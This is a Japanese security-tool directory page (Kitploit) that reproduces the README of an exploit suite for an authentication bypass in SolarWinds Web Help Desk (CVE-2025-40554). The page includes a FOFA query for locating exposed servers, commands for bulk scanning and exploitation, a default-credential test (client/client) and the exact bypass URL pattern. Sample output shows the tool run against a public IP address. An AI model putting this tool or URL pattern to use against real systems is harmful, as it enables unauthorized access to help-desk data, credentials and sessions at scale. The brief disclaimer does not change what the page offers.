Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/skynoxk/cve-2025-40554
偵察脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト認証
GitHubskynoxk/cve-2025-40554

CVE-2025-40554

CVE-2025-40554エクスプロイテーション

リポジトリを見る
27ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-40554 エクスプロイトスイート

SolarWinds Web Help Desk の認証バイパス脆弱性(CVE-2025-40554 / CVE-2025-40536)を検出・悪用するための包括的なセキュリティテストツールです。

⚠️ 免責事項

教育目的および許可を得たセキュリティテスト専用

このツールは、自身が所有する、または明示的な書面によるテスト許可を得たシステムに対する、セキュリティ研究、ペネトレーションテスト、脆弱性評価のために提供されています。コンピュータシステムへの不正アクセスは違法です。著者は、このツールの誤用または損害について一切の責任を負いません。

🔍 脆弱性の概要

CVE-2025-40554 は、SolarWinds Web Help Desk における重大な認証バイパス脆弱性であり、認証されていない攻撃者に以下を可能にします:

  • 認証メカニズムのバイパス
  • 特権管理機能へのアクセス(認証)
  • システム構成の列挙

影響を受けるバージョン

  • SolarWinds Web Help Desk(具体的なバージョン情報は要確認)
  • 修正済みバージョンについては SolarWinds のセキュリティアドバイザリを確認してください

🚀 特徴

自分で確認してみてください :))

依存関係:

  • Python 3.6+
  • requests ライブラリ
  • urllib3 ライブラリ

🛠️ インストール

root@kitploit:~
# Clone or download the script
wget https://raw.githubusercontent.com/username/repo/main/CVE-2025-40554.py

# Make executable
chmod +x CVE-2025-40554.py

📖 FOFA

root@kitploit:~
("Web Help Desk") && (icon_hash="1895809524" || icon_hash="804130677")

📖 使用方法

基本スキャン(単一ターゲット)

root@kitploit:~
# Simple vulnerability check
python3 CVE-2025-40554.py -t https://target:8443

# With explicit protocol
python3 CVE-2025-40554.py -t https://203.106.221.203:8443

完全エクスプロイトモード

root@kitploit:~
# Complete exploitation with session enumeration
python3 CVE-2025-40554.py -t https://target:8443 --exploit

# Skip default credential testing
python3 CVE-2025-40554.py -t https://target:8443 --exploit --no-login

一括スキャン

root@kitploit:~
# Scan multiple targets from file
python3 CVE-2025-40554.py -l targets.txt

# Bulk scan with exploitation
python3 CVE-2025-40554.py -l targets.txt --exploit

# Quiet mode (minimal output)
python3 CVE-2025-40554.py -l targets.txt -q

# Custom output file
python3 CVE-2025-40554.py -l targets.txt -o results.txt

ターゲットファイル形式

targets.txt:

root@kitploit:~
https://target1:8443
https://target2.example.com:8443
192.168.1.100:8443
target3.local:8443
# Comments are supported

🎯 コマンドラインオプション

📊 出力例

エクスプロイト成功例

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════╗
║     CVE-2025-40554 - SolarWinds Web Help Desk                    ║
║     Authentication Bypass Exploitation Tool                       ║
║     Research & Educational Purposes Only                          ║
╚═══════════════════════════════════════════════════════════════════╝

======================================================================
Target: https://203.106.221.203:8443
======================================================================
[*] Step 1: Establishing session...
[+] WOSID extracted: AbCdEfGhIjKlMnOpQrStU
[+] XSRF token: abc123-def456-ghi789

[*] Step 2: Testing authentication bypass...
[+] Found bypass indicators: externalAuthContainer, JSONRpcClient, SAML 2.0
[+] VULNERABLE - Auth bypass confirmed!

[*] Step 3: Testing default credentials (client/client)...
[+] SUCCESS - Default credentials work!

======================================================================
EXPLOITATION MODE - CVE-2025-40554 Auth Bypass
======================================================================

[*] Bypass URL: https://203.106.221.203:8443/helpdesk/WebObjects/Helpdesk.woa/wo/bogus.wo/AbCdEfGhIjKlMnOpQrStU/1.0?badparam=/ajax/&wopage=LoginPref
[*] Triggering authentication bypass...
[+] Auth bypass successful!

[*] Session Cookies:
  wosid = AbCdEfGhIjKlMnOpQrStU
  XSRF-TOKEN = abc123-def456-ghi789

======================================================================
SUMMARY
======================================================================
[+] Target is VULNERABLE to CVE-2025-40554
[+] Default credentials: WORK
======================================================================

一括スキャンの結果

root@kitploit:~
[*] Loaded 5 unique targets from targets.txt
[*] Mode: Bypass + default credential test
[*] Full exploitation enabled

[1/5] Testing https://target1:8443
[+] VULNERABLE - Auth bypass confirmed!
[+] SUCCESS - Default credentials work!

[2/5] Testing https://target2:8443
[!] NOT VULNERABLE - Auth bypass failed

...

======================================================================
SCAN SUMMARY
======================================================================
Total scanned:     5/5
Vulnerable:        2
With def. creds:   1
======================================================================

[+] Results saved to: vulnerable_targets.txt

🔧 技術的詳細

エクスプロイトフロー

  1. セッション確立

    • WHDインスタンスに接続
    • 複数のソースからWOSID(WebObjectsセッションID)を抽出
    • XSRFトークンが存在すれば取得
  2. 認証バイパス

    • WOSIDインジェクションを含む悪意のあるURLを生成
    • WebObjectsルーティングのパストラバーサルを悪用
    • 認証チェックをバイパス
  3. 認証情報テスト(オプション)

    • CSRF保護付きログインフォームを解析
    • デフォルト認証情報(client/client)をテスト
    • 認証成功を検証
  4. 完全エクスプロイト(--exploit モード)

    • セッションクッキーをエクスポート
    • メールアクセス、チケット、データベース、ユーザー(削除済み)

脆弱性の指標

このツールは、以下をチェックすることでバイパスの成功を検出します:

  • externalAuthContainer - 外部認証設定
  • JSONRpcClient - APIクライアントの露出
  • SAML 2.0 - SSO設定
  • LoginPref - ログイン設定
  • authMode - 認証モード設定

🤝 コントリビューション

コントリビューションは歓迎します.....

📚 参考情報

  • CVE-2025-40554 詳細
  • CVE-2025-40536 詳細
  • SolarWinds セキュリティアドバイザリ
  • WebObjects フレームワークのドキュメント

📄 ライセンス

このツールは、いかなる種類の保証もなく「現状のまま」提供されます。自己責任で使用してください。

👤 作者

Skynoxk


忘れないでください:常に倫理的かつ合法的にハッキングしてください。不正アクセスは犯罪です。

ツールをダウンロード
オプション説明
-t, --target URLテストする単一ターゲットのURL
-l, --list FILEターゲットのリストを含むファイル(1行に1つ)
--exploit列挙付きの完全エクスプロイトモードを有効化
--no-loginデフォルト認証情報のテストをスキップ
-o, --output FILE脆弱なターゲットの出力ファイル(デフォルト: vulnerable_targets.txt)
-q, --quiet最小出力モード(一括スキャンに便利)